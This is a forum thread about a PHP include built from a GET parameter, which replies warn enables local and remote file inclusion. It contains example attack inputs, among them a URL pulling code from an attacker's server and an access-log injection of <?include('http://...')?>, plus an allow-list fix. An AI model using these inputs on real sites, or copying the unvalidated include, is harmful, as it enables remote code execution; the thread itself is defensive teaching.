By using this site, you agree to our updated Privacy Policy and our Terms of Use. Manage your Cookies Settings.
440,649 Members | 2,142 Online
Bytes IT Community
+ Ask a Question
Need help? Post your question and get tips & solutions from a community of 440,649 IT Pros & Developers. It's quick & easy.

Include or require with a variable

P: n/a
Hi All

I've tried as many combinations as I can think of but I'm not getting any
where. This is what I have:

<?
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
?>

I've tried this with the full URL of the inc file as well which just
contains some HTML.

I then have:

<td><?php require'$menu'; ?></td>

I've tried:

<?php require('$menu'); ?>
<?php require($menu); ?>
<?php require'$menu'; ?>
<?php include('$menu'); ?>
<?php include($menu); ?>
<?php include'$menu'; ?>

It echoes the $menu string correctly but it either just truncates at <td> or
it displays the rest of the page but I just get <td></td>

Can someone point me in the right direction please.

Best

Andy

Jul 17 '05 #1
Share this Question
Share on Google+
9 Replies


P: n/a
Andy Jacobs wrote:
Hi All

I've tried as many combinations as I can think of but I'm not getting any
where. This is what I have:

<?
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
?>

I've tried this with the full URL of the inc file as well which just
contains some HTML.

I then have:

<td><?php require'$menu'; ?></td>

I've tried:

<?php require('$menu'); ?>
<?php require($menu); ?>
<?php require'$menu'; ?>
<?php include('$menu'); ?>
<?php include($menu); ?>
<?php include'$menu'; ?>

It echoes the $menu string correctly but it either just truncates at <td> or
it displays the rest of the page but I just get <td></td>

Can someone point me in the right direction please.

Best

Andy

Wow,

No one can say you didn't try! Firstly, don't use HTTP_GET_VARS or the
like as they are depreciated. Use instead the newer $_GET, $_POST, $_SERVER.

The correct what to include/require a file is with require() or
include(). So both the first two requires would work as well as the
first two includes.

I wonder if it's not working because the path is wrong? If you are not
seeing an error, then your error reporting is turned off (as is the
default with newer versions of PHP if I remember correctly). Check out
http://us3.php.net/errorfunc and turn on error reporting for now.

HTH,
Joe
Jul 17 '05 #2

P: n/a
In article <8z_%d.4000$%d7.2439@lakeread03>,
Joe Webster <jo*@cawfeemilk.com> wrote:
Andy Jacobs wrote:
Hi All

I've tried as many combinations as I can think of but I'm not getting any
where. This is what I have:

<?
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
?>

I've tried this with the full URL of the inc file as well which just
contains some HTML.

I then have:

<td><?php require'$menu'; ?></td>

I've tried:

<?php require('$menu'); ?>
<?php require($menu); ?>
<?php require'$menu'; ?>
<?php include('$menu'); ?>
<?php include($menu); ?>
<?php include'$menu'; ?>

It echoes the $menu string correctly but it either just truncates at <td>
or
it displays the rest of the page but I just get <td></td>

Can someone point me in the right direction please.

Best

Andy

Wow,

No one can say you didn't try! Firstly, don't use HTTP_GET_VARS or
the
like as they are depreciated. Use instead the newer $_GET, $_POST, $_SERVER.

The correct what to include/require a file is with require() or
include(). So both the first two requires would work as well as the
first two includes.

I wonder if it's not working because the path is wrong? If you are
not
seeing an error, then your error reporting is turned off (as is the
default with newer versions of PHP if I remember correctly). Check out
http://us3.php.net/errorfunc and turn on error reporting for now.

HTH,
Joe

Remember the old game of mastermind with little pegs? If you do then I
think this was what I was doing. I had one part right and 3 wrong. I
fixed one of the 3 wrong parts and then broke the one right part. One
of these being to actually upload the include files - ooops!

Anyway, thanks for the input. I must get into the habit of user the
newer variables!

Cheers

Andy
Jul 17 '05 #3

P: n/a
Andy Jacobs wrote:
In article <8z_%d.4000$%d7.2439@lakeread03>,
Joe Webster <jo*@cawfeemilk.com> wrote:

Andy Jacobs wrote:
Hi All

I've tried as many combinations as I can think of but I'm not getting any
where. This is what I have:

<?
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;
?>

I've tried this with the full URL of the inc file as well which just
contains some HTML.

I then have:

<td><?php require'$menu'; ?></td>

I've tried:

<?php require('$menu'); ?>
<?php require($menu); ?>
<?php require'$menu'; ?>
<?php include('$menu'); ?>
<?php include($menu); ?>
<?php include'$menu'; ?>

It echoes the $menu string correctly but it either just truncates at <td>
or
it displays the rest of the page but I just get <td></td>

Can someone point me in the right direction please.

Best

Andy


Wow,

No one can say you didn't try! Firstly, don't use HTTP_GET_VARS or
the
like as they are depreciated. Use instead the newer $_GET, $_POST, $_SERVER.

The correct what to include/require a file is with require() or
include(). So both the first two requires would work as well as the
first two includes.

I wonder if it's not working because the path is wrong? If you are
not
seeing an error, then your error reporting is turned off (as is the
default with newer versions of PHP if I remember correctly). Check out
http://us3.php.net/errorfunc and turn on error reporting for now.

HTH,
Joe


Remember the old game of mastermind with little pegs? If you do then I
think this was what I was doing. I had one part right and 3 wrong. I
fixed one of the 3 wrong parts and then broke the one right part. One
of these being to actually upload the include files - ooops!

Anyway, thanks for the input. I must get into the habit of user the
newer variables!

Cheers

Andy

Gremlins

Jul 17 '05 #4

P: n/a
Andy Jacobs wrote:
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu; [snip] <?php require($menu); ?>


Be very careful when doing things like this; if someone can inject a
file with an ".inc" extension somewhere onto your filesystem they can
execute it by calling your script something like this:

http://example.com/script.php?menu=....tmp/attack.inc

If there are existing .inc files on the system in known locations, they
can be executed (if PHP) or read (if not PHP) this way even without the
ability to upload files onto the system.

Note that it could be even worse: if you weren't prepending a directory
name, and allow_url_fopen is on (as default) the attacker could specify
a URL to an external web server, executing arbitrary PHP code on your
machine without needing any initial access to lay the attack groundwork.

You should always carefully validate input before using it this way.

-- brion vibber (brion @ pobox.com)
Jul 17 '05 #5

P: n/a
I am having trouble grasping how an attack program would do something
like this. Can anyone give me a better general basic understanding so
that I can more logically avoid the problems it poses when designing my
code?

thanks very much

http://example.com/script.php?menu=....tmp/attack.inc

If there are existing .inc files on the system in known locations, they

can be executed (if PHP) or read (if not PHP) this way even without the

ability to upload files onto the system.

Note that it could be even worse: if you weren't prepending a directory

name, and allow_url_fopen is on (as default) the attacker could specify

a URL to an external web server, executing arbitrary PHP code on your
machine without needing any initial access to lay the attack groundwork.

Jul 17 '05 #6

P: n/a
I create, on some web server (not yours) a page called foo.inc. Assume
you weren't prepending a directory name to $menu. When I go to your
page, I go to (supposing the URL after the ? is properly URL-encoded):

http://yourdomainname.com/somepage.p...inname.com/foo

Now your page takes that menu parameter, takes the value of it, appends
..inc, and you basically have, in your script:

require("http://mydomainname.com/foo.inc");

which means that the page living on my server was just executed in the
context of your script (on your server). Who knows what it could do?
The point is you don't know.

In general, I would stay away from including files who's names are
based on parameters from an HTTP request.

Jul 17 '05 #7

P: n/a
Here's my simple solution:

/*
* By defining each acceptable $page value below, you prevent hackers
* including executable code in the URL
*/

$unsecure_pages = array('login','tos','signup','copyright','privacy' );

$secure_pages = array('home','faq', 'domains');

/* check for login on secure pages here */
<snip>

/* get the include */
$ok_pages = array_merge($unsecure_pages, $secure_pages);

if ( in_array ($page, $ok_pages )) {

if(include_once ($tpath . $page . ".inc.php")) {

echo '';

} else {

die("Property Display Could Not Locate the Page ('$page')");
}
} else {

log_out();
exit;
}

You should also be naming your includes as .php so if someone does get one
to pop up, it gets processed by your server first rather than just showing
all your code which may include passwords and such.

hth,
John
"ZeldorBlat" <ze********@gmail.com> wrote in message
news:11**********************@g14g2000cwa.googlegr oups.com...
I create, on some web server (not yours) a page called foo.inc. Assume
you weren't prepending a directory name to $menu. When I go to your
page, I go to (supposing the URL after the ? is properly URL-encoded):

http://yourdomainname.com/somepage.p...inname.com/foo

Now your page takes that menu parameter, takes the value of it, appends
.inc, and you basically have, in your script:

require("http://mydomainname.com/foo.inc");

which means that the page living on my server was just executed in the
context of your script (on your server). Who knows what it could do?
The point is you don't know.

In general, I would stay away from including files who's names are
based on parameters from an HTTP request.

Jul 17 '05 #8

P: n/a
"Brion Vibber" <br***@pobox.com> wrote in message
news:3a*************@individual.net...
Andy Jacobs wrote:
$menu = 'menus/' . $HTTP_GET_VARS['menu'] . '.inc';
echo $menu;

[snip]
<?php require($menu); ?>


Be very careful when doing things like this; if someone can inject a
file with an ".inc" extension somewhere onto your filesystem they can
execute it by calling your script something like this:

http://example.com/script.php?menu=....tmp/attack.inc


The attacker could just inject PHP code into the Apache access log by going
to links in the form of http://www.dingo.net/<?include('http://...')?>, then
make PHP include the access log. It might take a while to parse but
eventually PHP would execute the statement.
Jul 17 '05 #9

P: n/a
Tex John wrote:
You should also be naming your includes as .php so if someone does get one
to pop up, it gets processed by your server first rather than just showing
all your code which may include passwords and such.


A warning is in order here, though: you need to code on the assumption
that any of your .php files can be directly executed, so you need to
make sure they are individually safe to run. Consider output, filesystem
or database side effects, use of global variables (register_globals
vulnerabilities), etc.

One very simple way is to only have known entry point scripts with
actual runnable code, and have all others be function and class
declarations only.

It's safer still to keep your include files outside of the web server's
document root; you can set PHP's include_path for convenience.

-- brion vibber (brion @ pobox.com)
Jul 17 '05 #10

This discussion thread is closed

Replies have been disabled for this discussion.